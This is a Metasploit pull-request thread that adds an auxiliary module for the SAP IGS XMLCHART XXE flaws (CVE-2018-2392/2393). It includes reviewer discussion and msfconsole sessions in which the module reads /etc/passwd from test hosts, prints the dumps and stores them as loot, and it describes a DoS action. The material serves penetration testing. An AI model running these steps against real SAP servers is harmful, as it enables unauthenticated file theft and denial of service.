SAP Internet Graphics Server (IGS) XMLCHART XXE attack (CVE-2018-2392 and CVE-2018-2393)

[Vladimir-Ivanov-Git]

This PR adds in support for exploiting CVE-2018-2392 and CVE-2018-2393, two XXE bugs in SAP Internet Graphics Server (IGS) version 7.20, 7.20EXT, 7.45, 7.49, 7.53. There are two options for exploitation. The first one is READ, which abuses these two vulnerabilities to read an arbitrary file from the SAP IGS server as the user which started the IGS service, which will typically be the SAP administrator. The second one is DOS, which will exploit the XXE issue to cause a denial of service condition on the targeted SAP IGS server.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• Do: workspace [WORKSPACE]
• Do: use auxiliary/admin/sap/sap_igs_xmlchart_xxe
• Do: set RHOSTS [IP]
• Do: set FILE "/etc/passwd"
• Do: set action READ
• Do: check
• Verify that the check method correctly determines if the target is vulnerable or not.
• Do: run
• Verify that the run method runs the check code again and also successfully retrieves the contents of the target file, which in this case will be /etc/passwd.
• Verify that the exploit still works with other files.
• Document any issues encountered.

[label-actions]

When creating a pull request, please ensure that the default pull request template has been updated with the required details.

[label-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[label-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[Vladimir-Ivanov-Git]

About

This module implements the SAP Internet Graphics Server (IGS) XXE attack.
An unauthenticated attacker can remotely read files in the server's file system, for example: /etc/passwd
Vulnerable SAP IGS versions: 7.20, 7.20EXT, 7.45, 7.49, 7.53
Research presentation: https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf by @_1ggy Yvan Genuer
CVE-2018-2392
CVE-2018-2393

Verification Steps

1. Install the module as usual
2. Start msfconsole
3. Do: workspace [WORKSPACE]
4. Do: use auxiliary/admin/sap/sap_igs_xxe
5. Do: set RHOSTS [IP]
6. Do: set FILE [remote file name]
7. Do: set SHOW [true|false]
8. Do: set action READ
9. Do: check
10. Do: run

Options

FILE

File to read from the remote server, example: /etc/passwd

SHOW

true - show remote file content and save in workspace loot
false - not show remote file content and save in workspace loot

URN

Vulnerable SAP IGS URN by default: /XMLCHART

Actions

   Name  Description
   ----  -----------
   READ  Remote file read
   DOS   Denial Of Service

Scenarios

Vulnerable SAP IGS release: 7.45 running on SUSE Linux Enterprise Server for SAP Applications 12 SP1

msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xxe
msf6 auxiliary(admin/sap/sap_igs_xxe) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf6 auxiliary(admin/sap/sap_igs_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xxe) > options

Module options (auxiliary/admin/sap/sap_igs_xxe):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FILE     /etc/passwd          yes       File to read from the remote server
   Proxies  http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.10          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    40080                yes       The target port (TCP)
   SHOW     true                 no        Show remote file content
   SSL      false                no        Negotiate SSL/TLS for outgoing connections
   URN      /XMLCHART            no        SAP IGS XMLCHART URN
   VHOST                         no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read


msf6 auxiliary(admin/sap/sap_igs_xxe) > check
[+] 10.10.10.10:40080 - The target is vulnerable. OS info: SUSE Linux Enterprise Server for SAP Applications 12 SP1
msf6 auxiliary(admin/sap/sap_igs_xxe) > run
[*] Running module against 10.10.10.10

[+] File: /etc/passwd content from host: 10.10.10.10
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
messagebus:x:499:499:User for D-Bus:/var/run/dbus:/bin/false
sshd:x:498:498:SSH daemon:/var/lib/sshd:/bin/false
polkitd:x:497:496:User for polkitd:/var/lib/polkit:/sbin/nologin
nscd:x:496:495:User for nscd:/run/nscd:/sbin/nologin
rpc:x:495:65534:user for rpcbind:/var/lib/empty:/sbin/nologin
openslp:x:494:2:openslp daemon:/var/lib/empty:/sbin/nologin
uuidd:x:493:492:User for uuidd:/var/run/uuidd:/bin/bash
usbmux:x:492:65534:usbmuxd daemon:/var/lib/usbmuxd:/sbin/nologin
ntp:x:74:491:NTP daemon:/var/lib/ntp:/bin/false
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
vnc:x:491:490:user for VNC:/var/lib/empty:/sbin/nologin
rtkit:x:490:489:RealtimeKit:/proc:/bin/false
pulse:x:489:488:PulseAudio daemon:/var/lib/pulseaudio:/sbin/nologin
statd:x:488:65534:NFS statd daemon:/var/lib/nfs:/sbin/nologin
ftpsecure:x:487:65534:Secure FTP User:/var/lib/empty:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
scard:x:486:485:Smart Card Reader:/var/run/pcscd:/usr/sbin/nologin
gdm:x:485:483:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
erpadm:x:1001:1001:SAP System Administrator:/home/erpadm:/bin/csh
sapadm:x:1002:1001:SAP System Administrator:/home/sapadm:/bin/false

[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20200929135102_SAP_TEST_10.10.10.10_sap.igs.xxe_302025.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xxe) > services
Services
========

host         port   proto  name  state  info
----         ----   -----  ----  -----  ----
10.10.10.10  40080  tcp    http  open   SAP Internet Graphics Server (IGS); OS info: SUSE Linux Enterprise Server for SAP Applications 12 SP1

msf6 auxiliary(admin/sap/sap_igs_xxe) > vulns

Vulnerabilities
===============

Timestamp                Host         Name                                    References
---------                ----         ----                                    ----------
2020-09-29 10:51:01 UTC  10.10.10.10  SAP Internet Graphics Server (IGS) XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xxe) > loot

Loot
====

host         service  type         name         content     info         path
----         -------  ----         ----         -------     ----         ----
10.10.10.10           sap.igs.xxe  /etc/passwd  text/plain  SAP IGS XXE  /Users/vladimir/.msf4/loot/20200929135102_SAP_TEST_10.10.10.10_sap.igs.xxe_302025.txt

[Vladimir-Ivanov-Git]

@cdelafuente-r7 add docs #14163 (comment)

[gwillcox-r7]

About

This module implements the SAP Internet Graphics Server (IGS) XXE attack.
Research presentation: https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf by @_1ggy Yvan Genuer

Verification Steps

1. Install the module as usual
2. Start msfconsole
3. Do: workspace [WORKSPACE]
4. Do: use auxiliary/admin/sap/sap_igs_xxe
5. Do: set RHOSTS [IP]
6. Do: set FILE [remote file name]
7. Do: set SHOW [true|false]
8. Do: set action READ
9. Do: check
10. Do: run

Options

FILE

Remote file name, example: /etc/passwd

SHOW

true - show remote file content and save in workspace loot
false - not show remote file content and save in workspace loot

URN

Vulnerable SAP IGS URN by default: /XMLCHART

Actions

   Name  Description
   ----  -----------
   READ  Remote file read
   DOS   Denial Of Service

Scenarios

Vulnerable SAP IGS release: 745 running on SUSE Linux Enterprise Server for SAP Applications 12 SP1

msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xxe
msf6 auxiliary(admin/sap/sap_igs_xxe) > set rhosts 10.10.10.10
rhosts => 10.10.10.10
msf6 auxiliary(admin/sap/sap_igs_xxe) > options

Module options (auxiliary/admin/sap/sap_igs_xxe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FILE     /etc/passwd      yes       Remote file name for read
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.10      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    40080            yes       The target port (TCP)
   SHOW     true             no        Show remote file content
   SSL      false            no        Use SSL/TLS
   Threads  1                no        Number of threads
   Timeout  10               no        TCP connection timeout
   URN      /XMLCHART        no        SAP IGS XMLCHART URN
   VHOST                     no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read


msf6 auxiliary(admin/sap/sap_igs_xxe) > check
[+] 10.10.10.10:40080 - The target is vulnerable. OS info: SUSE Linux Enterprise Server for SAP Applications 12 SP1
msf6 auxiliary(admin/sap/sap_igs_xxe) > services
Services
========

host         port   proto  name  state  info
----         ----   -----  ----  -----  ----
10.10.10.10  40080  tcp    http  open   SAP Internet Graphics Server (IGS); OS info: SUSE Linux Enterprise Server for SAP Applications 12 SP1

msf6 auxiliary(admin/sap/sap_igs_xxe) > vulns

Vulnerabilities
===============

Timestamp                Host         Name                                    References
---------                ----         ----                                    ----------
2020-09-24 09:02:03 UTC  10.10.10.10  SAP Internet Graphics Server (IGS) XXE  URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xxe) > run
[*] Running module against 10.10.10.10

[+] File: /etc/passwd content from host: 10.10.10.10
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
gdm:x:485:483:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:499:499:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:491:NTP daemon:/var/lib/ntp:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:489:488:PulseAudio daemon:/var/lib/pulseaudio:/sbin/nologin
root:x:0:0:root:/root:/bin/bash
sshd:x:498:498:SSH daemon:/var/lib/sshd:/bin/false
statd:x:488:65534:NFS statd daemon:/var/lib/nfs:/sbin/nologin
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
sapadm:x:1002:79:SAP System Administrator:/home/sapadm:/bin/false
erpadm:x:1001:79:SAP System Administrator:/home/erpadm:/bin/csh

[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20200924120226_SAP_TEST_10.10.10.10_sap.igs.xxe_595660.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xxe) > loot

Loot
====

host         service  type         name  content     info  path
----         -------  ----         ----  -------     ----  ----
10.10.10.10           sap.igs.xxe        text/plain        /Users/vladimir/.msf4/loot/aac432b86a306458c9e7-20200924120226_SAP_TEST_10.10.10.10_sap.igs.xxe_595660.txt

msf6 auxiliary(admin/sap/sap_igs_xxe) >

All of this information should be moved from this comment into a file at documentation/modules/auxiliary/admin/sap/sap_igs_xxe.md. Before submitting these changes, please also make sure that you run tools/dev/msftidy_docs.rb documentation/modules/auxiliary/admin/sap/sap_igs_xxe.md and fix any of the errors reported.

Additionally, if you could run rubocop -a modules/auxiliary/admin/sap/sap_igs_xxe.rb and upload the module file again after RuboCop applies its automatic changes, this would be much appreciated!

[gwillcox-r7]

Made some recommendations based on the code so far, code will likely need a few more rounds of review before its ready to land. Please let me know if you have any questions or concerns as I know a few of the recommended changes may be a little confusing.

[gwillcox-r7]

A lot of the code for this function seems similar to the code for the check method, which is in turn similar to the code for the action_file_read function. I would look at trying to reduce code reuse throughout your module as it seems a lot of these functions perform nearly identical actions at times.

[gwillcox-r7]

@Vladimir-Ivanov-Git Reviewed some of the changes you made, there are a few that seem like they weren't addressed though. I'll edit a few of these issues where I can tomorrow but until then I still need the following info:

• Root cause of the bug which includes but is not limited to:
  • The affected page on the web server
  • The affected parameter(s) on the web server.
  • Any mitigations the server attempts to put in place to prevent you exploiting this bug.
• Info on where to get a vulnerable copy of the affected software. Download links, info on the server model etc.
• Set up instructions on how to set up the vulnerable target. These need to be as detailed as possible. We've had issues in the past going back and forth with contributors on how to get their targets set up correctly and most of the time it was due to a lack of detail on this point, so please put in sufficient detail here. If in doubt, remember that more info is better.
• Details on whether just /XMLCHART is affected or if there are other pages which could also be used for exploitation.

[Vladimir-Ivanov-Git]

@Vladimir-Ivanov-Git Reviewed some of the changes you made, there are a few that seem like they weren't addressed though. I'll edit a few of these issues where I can tomorrow but until then I still need the following info:

• Root cause of the bug which includes but is not limited to:

  • The affected page on the web server
  • The affected parameter(s) on the web server.
  • Any mitigations the server attempts to put in place to prevent you exploiting this bug.

• Info on where to get a vulnerable copy of the affected software. Download links, info on the server model etc.

• Set up instructions on how to set up the vulnerable target. These need to be as detailed as possible. We've had issues in the past going back and forth with contributors on how to get their targets set up correctly and most of the time it was due to a lack of detail on this point, so please put in sufficient detail here. If in doubt, remember that more info is better.

• Details on whether just /XMLCHART is affected or if there are other pages which could also be used for exploitation.

6d96e37

[Vladimir-Ivanov-Git]

URN: /XMLCHART is the only one page exposed to XXE attack
Research: https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

[label-actions]

Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.

We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.

To help unblock this pull request, please:

• Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
• Or comment guided steps on how to set up our environment for testing this module
• Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com

Once there's a clear path for testing and evaluating this module, we can progress with this further.

[gwillcox-r7]

@Vladimir-Ivanov-Git I have tried to get access to the SAP IGS server as a download but it appears that it is paid software and Rapid7 does not have a copy of it in our testing labs. Most likely we will need to receive PCAPs from you showing that this module works as expected unless we are somehow able to obtain a legal copy of the software for testing. Please send these PCAPs to the address listed above.

Additionally this module is still missing setup steps. I have attempted to add some initial setup steps and marked where I had to stop with XXX along with some comments as to why I wasn't able to continue within the documentation. Note that simply linking to external documentation is not desirable as we would prefer our documentation to be self contained.

Please additionally note that within the module I was not able to determine as which user the file read occurs as. Is it the user running the SAP IGS server? SYSTEM? Some other user? It would be helpful given this essentially an arbitrary file read vulnerability to know who we are reading the files as since certain files such as /etc/shadow might not be readable without the right permissions.

I have also made several changes in the meantime to sort out some of the issues described in my earlier reviews. There is still more work to do though and I will be adding another round of reviews in after these issues

[gwillcox-r7]

Changes from 0a6f3a7 look good, still reviewing the other commit

[gwillcox-r7]

[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201006213400_default_172.16.30.29_sap.igs.xmlchart_583380.txt

This output is not from after b080803 was applied: it does not include several changes that were made to the output.

[gwillcox-r7]

08f4284 Should fix the issues identified in the last review. The comment at #14163 (comment) still applies though, as does the part about updating the documentation with the new output from the exploit.

[Vladimir-Ivanov-Git]

08f4284 Should fix the issues identified in the last review. The comment at #14163 (comment) still applies though, as does the part about updating the documentation with the new output from the exploit.

Current ltype - sap.igs.xmlchart.xxe
The last 4 bytes - .xxe are cut off, because maximum ltype length is 16 bytes.
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb#L411

[Vladimir-Ivanov-Git]

[Vladimir-Ivanov-Git]

After 0c26fd2

msf6 > workspace -a SAP
[*] Added workspace: SAP
[*] Workspace: SAP
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options

Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FILE     /etc/passwd          no        File to read from the remote server
   Proxies  http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.30.29         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    40080                yes       The target port (TCP)
   SSL      false                no        Negotiate SSL/TLS for outgoing connections
   URIPATH  /XMLCHART            yes       Path to the SAP IGS XMLCHART page from the web root
   VHOST                         no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read


msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] Running module against 172.16.30.29

[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007130158_SAP_172.16.30.29_igs.xmlchart.xxe_985708.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
Services
========

host          port   proto  name  state  info
----          ----   -----  ----  -----  ----
172.16.30.29  40080  tcp    http  open   SAP Internet Graphics Server (IGS)

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                             References
---------                ----          ----                                             ----------
2020-10-07 10:01:57 UTC  172.16.30.29  SAP Internet Graphics Server (IGS) XMLCHART XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot

Loot
====

host          service  type              name         content     info                  path
----          -------  ----              ----         -------     ----                  ----
172.16.30.29           igs.xmlchart.xxe  /etc/passwd  text/plain  SAP IGS XMLCHART XXE  /Users/vladimir/.msf4/loot/ecd3adc3d2e5036abe2a-20201007130158_SAP_172.16.30.29_igs.xmlchart.xxe_985708.txt

[gwillcox-r7]

Last commits look all good, should be good to land this now 👍

[gwillcox-r7]

Alright going to do a quick rebase of this module @Vladimir-Ivanov-Git, just so that the commit history is a little easier to see as right now there are a lot of cases where there are multiple commits which are all essentially doing the same thing. Once this is cleaned up (which I will do now) I'll land this in.

[gwillcox-r7]

Quick note for future @Vladimir-Ivanov-Git but if in future you could make sure your commit messages have useful info about what they change, that would be helpful. Its a little confusing looking at a commit message that just says "Update script", as it doesn't tell me what that commit actually did.

[Vladimir-Ivanov-Git]

Quick note for future @Vladimir-Ivanov-Git but if in future you could make sure your commit messages have useful info about what they change, that would be helpful. Its a little confusing looking at a commit message that just says "Update script", as it doesn't tell me what that commit actually did.

My bad

[gwillcox-r7]

Quick note for future @Vladimir-Ivanov-Git but if in future you could make sure your commit messages have useful info about what they change, that would be helpful. Its a little confusing looking at a commit message that just says "Update script", as it doesn't tell me what that commit actually did.

My bad

No problem fixed it up, all good :)

[gwillcox-r7]

Original Release Notes
A new module for exploiting CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities in outdated versions of SAP IGS servers, has now been added into the framework. Users can exploit these vulnerabilities via the new module to read arbitrary files on affected systems as the user who installed the SAP IGS server. Alternatively users can also use these vulnerabilities to conduct a DoS attack against the vulnerable SAP IGS server.

[gwillcox-r7]

Thanks for the submission @Vladimir-Ivanov-Git, and congrats on landing your first PR in Metasploit! 🥳

[pbarry-r7]

Release Notes

New module auxiliary/admin/sap/sap_igs_xmlchart_xxe targets older versions of SAP IGS servers, supporting arbitrary file read and DoS attacks against vulnerable targets (CVE-2018-2392, CVE-2018-2393).